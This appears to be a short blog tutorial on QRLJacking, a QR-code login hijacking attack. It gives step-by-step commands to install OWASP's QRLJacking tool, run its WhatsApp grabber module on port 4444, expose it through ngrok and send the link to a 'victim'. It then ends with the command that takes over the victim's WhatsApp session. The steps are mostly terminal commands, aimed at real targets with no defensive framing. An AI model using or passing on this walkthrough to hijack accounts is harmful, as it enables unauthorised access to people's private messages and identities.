QRLJacking or Quick Response Code Login Jacking is a simple social engineering attack vector capable of hijacking the session and affecting all applications that rely on QR Code Login as security to log into your account. QR code leads to session hijacking.
How to download and install the QrlJacking tool?
Step 1: Download the Tool
1. First, we need to download the QRLJacking tool, so run the following command in your terminal.
git clone https://github.com/OWASP/QRLJacking.git 
2. Now change the directory to QRLJacking, so enter the following command in your terminal.
cd QRLJacking 
3. Now again change the directory to QRLJacker
cd QRLJacker 
Step 2: Run the tool
1. Then set the requirements for the QRLJacking tool, so enter the following command in your terminal.
pip install -r requirements.txt 
2. After that run the Qrljacker.py python file so execute the following command.
python3 Qrljacker.py 
Step 3: Hack Whatsapp
1. First you need to select the WhatsApp session hijacking module so enter the below command on your QRLJacking terminal.
use grabber/whatsapp 
2. Now set the following required parameter
- IP Address
- Port Number
set host (your local ip (or) ngrok)set port 4444 
3. Then type the run command to execute the whatsapp grabber module
run 
4. Then open your ngrok and share the ngrok link to your victim because the localhost only supports the local network
5. Once your victim scans your QRcode you will get a session as shown image below.
6. Once you get the above message you will type the following command on your QRLJacker terminal to access the victim WhatsApp account
session -i 0
إرسال تعليق